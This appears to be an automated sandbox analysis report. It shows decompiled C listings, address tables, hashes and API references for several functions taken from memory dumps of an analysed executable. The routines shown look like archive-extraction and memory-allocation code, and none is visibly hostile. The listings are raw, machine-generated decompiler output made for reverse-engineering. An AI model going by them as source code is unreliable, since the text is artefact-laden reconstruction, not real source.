Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cc3843631d4efef9e758eb8dd3241f574fe49e4eb5402b1606c959e6839bf6ac
Instruction ID: e5e105211ed45a2e1d9c9558728009c17220a5ba0ea32973c137d12f455fb088
Opcode Fuzzy Hash: cc3843631d4efef9e758eb8dd3241f574fe49e4eb5402b1606c959e6839bf6ac
Instruction Fuzzy Hash: EAB1BF70A04687BFEF29CF78C484BB9FBE6BF15304F140259E45A97281D730A9A4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001981C4, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E001981C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E001AD870(E001C12D2, _t95);
				E001AD940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E0019137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00199C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00191973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0019FAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0019B782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00196EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0019A1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E0019835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E001A0FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00191E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E0019391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E001983C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00196E03(0x1d00e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E0019162D(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x001981c4
0x001981c4
0x001981c4
0x001981c4
0x001981c9
0x001981d3
0x001981d9
0x001981db
0x001981e4
0x001981e9
0x001981f4
0x00198201
0x00198209
0x0019820f
0x00198216
0x00198229
0x00198230
0x00198237
0x0019823a
0x0019823c
0x00198242
0x00198249
0x00198250
0x00198257
0x0019825c
0x00198277
0x00198283
0x0019828a
0x0019828f
0x00198295
0x0019829a
0x0019829c
0x001982a3
0x001982aa
0x001982af
0x001982b1
0x00000000
0x00000000
0x00198264
0x0019826a
0x00198270
0x00198270
0x001982b3
0x001982b9
0x001982b9
0x001982bf
0x001982c8
0x001982cd
0x001982d2
0x001982d3
0x001982d4
0x001982dc
0x001982df
0x001982e6
0x001982e6
0x001982e1
0x001982e1
0x001982e4
0x00000000
0x00000000
0x001982e4
0x001982ed
0x001982f0
0x001982f7
0x001982f9
0x00198307
0x00198307
0x0019830e
0x0019830e
0x00198313
0x00198319
0x0019831e
0x0019831e
0x00198324
0x00198329
0x0019832e
0x00198337
0x0019833c
0x0019833c
0x0019831e
0x00198218
0x0019821f
0x0019821f
0x00198216
0x00198340
0x00198346
0x00198351
0x0019835b

APIs

__EH_prolog.LIBCMT ref: 001981C9

Part of subcall function 0019137D: __EH_prolog.LIBCMT ref: 00191382
Part of subcall function 0019137D: new.LIBCMT ref: 001913FA

Part of subcall function 00191973: __EH_prolog.LIBCMT ref: 00191978

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22d19d27ae4c403e52e5dd238cbd0aef5c1cb795f2d286af06efa6e8c2295b3f
Instruction ID: 1b160a1d90f946ec507fa060befefdba1c28365379cf769fbab40283b155da9f
Opcode Fuzzy Hash: 22d19d27ae4c403e52e5dd238cbd0aef5c1cb795f2d286af06efa6e8c2295b3f
Instruction Fuzzy Hash: 9741A771940654AADF24EB60CC55FEA7378AF61704F0404EAE54AA3093DF74AFC8DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001A2A7F, Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001A2A7F(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E001AD870(E001C1486, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E001ADB02(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E001AE920(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E001ADB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0x1d00e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E001A1788);
						_push(E001A1611);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E001AD96D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E001AE920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E001B2B53(0x1d00e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x1d00e0 = 0x30c00;
								if(_t39 == 0) {
									E00196D3A(0x1d00e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x001a2a7f
0x001a2a7f
0x001a2a84
0x001a2a89
0x001a2a8a
0x001a2a8e
0x001a2a90
0x001a2a92
0x001a2a95
0x001a2a9c
0x001a2a9d
0x001a2aa5
0x001a2aa8
0x001a2aad
0x001a2aad
0x001a2ab0
0x001a2ab3
0x001a2abe
0x001a2ac5
0x001a2ac7
0x001a2aca
0x001a2adf
0x001a2ae0
0x001a2ae5
0x001a2ae6
0x001a2ae9
0x001a2aec
0x001a2aee
0x001a2af0
0x001a2af5
0x001a2afa
0x001a2afb
0x001a2afb
0x001a2afe
0x001a2b00
0x001a2b05
0x001a2b06
0x001a2b06
0x001a2b0b
0x001a2b15
0x001a2b1c
0x001a2b26
0x001a2b28
0x001a2b2a
0x001a2b2d
0x001a2b30
0x001a2b39
0x001a2b40
0x001a2b4a
0x001a2b4f
0x001a2b55
0x001a2b58
0x001a2b5f
0x001a2b5f
0x001a2b64
0x001a2b64
0x001a2b67
0x001a2b6c
0x001a2b6f
0x001a2b6f
0x001a2b2d
0x001a2b26
0x001a2b7a
0x001a2b84

APIs

__EH_prolog.LIBCMT ref: 001A2A84

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 23916a95d97ed3e3babf353620c67fb2c7c3a8213201d2b2799079005d3e8b45
Instruction ID: 79d35b55778951dd961f5c557a93fe2d4995c0110a9f2e80dbc7ec9e08ee48b5
Opcode Fuzzy Hash: 23916a95d97ed3e3babf353620c67fb2c7c3a8213201d2b2799079005d3e8b45
Instruction Fuzzy Hash: 6421F3B5E40215AFDB14DF78DC42A6B77A8FB16314F04463AE919EB682E7709D00C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 001A9EEF, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001A9EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E001AD870(E001C14E1, _t62);
				_push(_t47);
				E001AD940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E0019137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00191E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E0019192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E001B2B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E001AEA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E001915E3(_t62 - 0x24);
					E0019162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E0019162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x001a9eef
0x001a9eef
0x001a9eef
0x001a9ef4
0x001a9ef9
0x001a9eff
0x001a9f05
0x001a9f06
0x001a9f09
0x001a9f13
0x001a9f16
0x001a9f24
0x001a9f28
0x001a9f33
0x001a9f44
0x001a9f47
0x001a9f4a
0x001a9f4d
0x001a9f50
0x001a9f56
0x001a9f5b
0x001a9f61
0x001a9f66
0x001a9f68
0x001a9f6a
0x001a9f6d
0x001a9f73
0x001a9f7a
0x001a9f7f
0x001a9f81
0x001a9f83
0x001a9f89
0x001a9f8c
0x001a9f94
0x001a9f85
0x001a9f85
0x001a9f85
0x001a9f9f
0x001a9f9f
0x001a9fa4
0x001a9faf
0x001a9fb4
0x001a9f35
0x001a9f3b
0x001a9f40
0x001a9f40
0x001a9fbb
0x001a9fc6

APIs

__EH_prolog.LIBCMT ref: 001A9EF4

Part of subcall function 0019137D: __EH_prolog.LIBCMT ref: 00191382
Part of subcall function 0019137D: new.LIBCMT ref: 001913FA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 52461969112ac028d6c452ef93ef0a3c5bbe6d553d96c96c556426f3fe745643
Instruction ID: 5819d9d901749ba681429158eb941675f4bef532b093e96690262d4c25cfaaa8
Opcode Fuzzy Hash: 52461969112ac028d6c452ef93ef0a3c5bbe6d553d96c96c556426f3fe745643
Instruction Fuzzy Hash: CA218E75D0424AAECF15DF95D9819EEBBF4BF2A304F0004AEE809A7202D7356E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0019910B, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0019910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E001AD870(E001C1321, _t42);
				E00196ED7(_t42 - 0x20, E00197C3C());
				_push( *((intOrPtr*)(_t42 - 0x1c)));
				_push( *((intOrPtr*)(_t42 - 0x20)));
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0019C70F();
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0019C8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t42 - 0x1c)));
						_push( *((intOrPtr*)(_t42 - 0x20)));
						_t40 = E0019C70F();
					} while (_t40 > 0);
				}
				_t21 = E0019159C(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x0019910b
0x00199110
0x00199122
0x00199127
0x0019912d
0x00199130
0x00199139
0x0019913d
0x00199140
0x00199144
0x00199147
0x00199147
0x00199149
0x0019914a
0x0019914c
0x00199154
0x00199154
0x00199158
0x00199161
0x00199168
0x00199169
0x0019916b
0x0019916b
0x0019916d
0x00199173
0x0019917b
0x0019917d
0x00199182
0x00199186
0x0019918f
0x00199199

APIs

__EH_prolog.LIBCMT ref: 00199110

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ef79b468bf778a9bed5266109b83200dd0db59098bdde32aee9b4b57175348cf
Instruction ID: 9f185353335e7d2b8f1b20a8feb8595ce2281d6d481e7ad56b516c5ed83a7d7d
Opcode Fuzzy Hash: ef79b468bf778a9bed5266109b83200dd0db59098bdde32aee9b4b57175348cf
Instruction Fuzzy Hash: A811A177E00429ABCF16ABACCC519EEB736BF58760F054529F811A7252CB348D148BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001AC6FF, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E001AC6FF(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E001AD870(E001C1520, _t43);
				_push(_t26);
				E001AD940();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E001B4D7E(0x1e39fa, "X");
				E0019FB08(0x1e5a1c, _t37, 0x1c22e0);
				E001B4D7E(0x1e4a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E00195A9F(0x1db708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0x1e29d8 = _t18;
				 *0x1e29d4 = _t18;
				 *0x1e29d0 = _t18;
				_t19 =  *0x1d75d4; // 0x0
				 *0x1e185b = _t19;
				_t20 =  *0x1d75d5; // 0x1
				 *0x1e1894 = 1;
				 *0x1e1897 = 1;
				 *0x1e185c = _t20;
				E00197ADF(_t43 - 0x2108, _t37,  *_t4, 0x1db708);
				 *(_t43 - 4) = 1;
				E00197C55(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00197B71(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}

0x001ac6ff
0x001ac704
0x001ac709
0x001ac70f
0x001ac714
0x001ac717
0x001ac724
0x001ac735
0x001ac742
0x001ac753
0x001ac758
0x001ac758
0x001ac764
0x001ac765
0x001ac76a
0x001ac76f
0x001ac774
0x001ac779
0x001ac77e
0x001ac784
0x001ac78b
0x001ac792
0x001ac797
0x001ac7a2
0x001ac7a6
0x001ac7b1
0x001ac7bb
0x001ac7c6

APIs

__EH_prolog.LIBCMT ref: 001AC704

Part of subcall function 00197ADF: __EH_prolog.LIBCMT ref: 00197AE4
Part of subcall function 00197ADF: new.LIBCMT ref: 00197B28

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 58654063c79b6e3703dd14299d9c2992fb6d83f03eb3071f2dbdcd7c88d80cd0
Instruction ID: c1533dda1b3b347eb382e259f9fbf1ab4d52f4734bd2c0d77983d18a777957a1
Opcode Fuzzy Hash: 58654063c79b6e3703dd14299d9c2992fb6d83f03eb3071f2dbdcd7c88d80cd0
Instruction Fuzzy Hash: 9411E7755092D4AEC704DBA8E992BEC7BB4DB75314F04406FF4096B693DBB11AC4CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00195A1D, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00195A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E001AD870(E001C1216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0019AD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0019FAE6();
				 *(_t36 - 4) = 1;
				E0019FAE6();
				 *(_t36 - 4) = 2;
				E0019FAE6();
				 *(_t36 - 4) = 3;
				E0019FAE6();
				 *(_t36 - 4) = 4;
				E0019FAE6();
				 *(_t36 - 4) = 5;
				E00195C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00195a1d
0x00195a22
0x00195a27
0x00195a29
0x00195a2b
0x00195a2e
0x00195a33
0x00195a33
0x00195a3d
0x00195a48
0x00195a4c
0x00195a57
0x00195a5b
0x00195a66
0x00195a6a
0x00195a75
0x00195a79
0x00195a80
0x00195a84
0x00195a8f
0x00195a99

APIs

__EH_prolog.LIBCMT ref: 00195A22

Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0be03aeb828a7570634589183e732fdfb369407fedcc67e9d71dc80ff0185161
Instruction ID: 46013952863dd7795617ce979ee9ebeab5728dabafbe9b5f28975454476e9c79
Opcode Fuzzy Hash: 0be03aeb828a7570634589183e732fdfb369407fedcc67e9d71dc80ff0185161
Instruction Fuzzy Hash: 39018134919644EEDB15EBA4C2057EEB7E8AF36318F10059DE44E93382CBB82B05C763

Uniqueness

Uniqueness Score: -1.00%

Function 001B7A8A, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E001B7A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E001B7ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1f0874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E001B7906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E001B6763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x001b7a8a
0x001b7a90
0x001b7a96
0x001b7ac8
0x001b7acd
0x001b7ad3
0x00000000
0x001b7ad3
0x001b7a9a
0x001b7a9c
0x001b7a9c
0x001b7ab3
0x001b7abc
0x001b7ac4
0x00000000
0x00000000
0x001b7aa4
0x001b7aa6
0x00000000
0x00000000
0x001b7aa9
0x001b7aae
0x001b7aaf
0x001b7ab1
0x00000000
0x00000000
0x001b7ab1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4bd6ad06959d2b83239730aabeb7017a3a07a7e64e9c9ea87e75ceb44f7f08a9
Instruction ID: a2804987e0cc494b890bef1f85822d8eb4406750089ba4dfa50857138cf4fc58
Opcode Fuzzy Hash: 4bd6ad06959d2b83239730aabeb7017a3a07a7e64e9c9ea87e75ceb44f7f08a9
Instruction Fuzzy Hash: EAE06D356482227BE6A236759D01BEE7A49EFE17B1F1E0121EC15A71D1CF60CE40C2E1

Uniqueness

Uniqueness Score: -1.00%

Function 001994DA, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E001994DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00196C7B(0x1d00e0, _t21 + 0x1e);
				}
				return _t16;
			}

0x001994dc
0x001994de
0x001994e4
0x001994ea
0x001994fb
0x00199500
0x00199502
0x00199502
0x00199504
0x00199504
0x00199508
0x0019950e
0x0019951e
0x0019951e
0x00199527

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001994AA), ref: 001994F5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

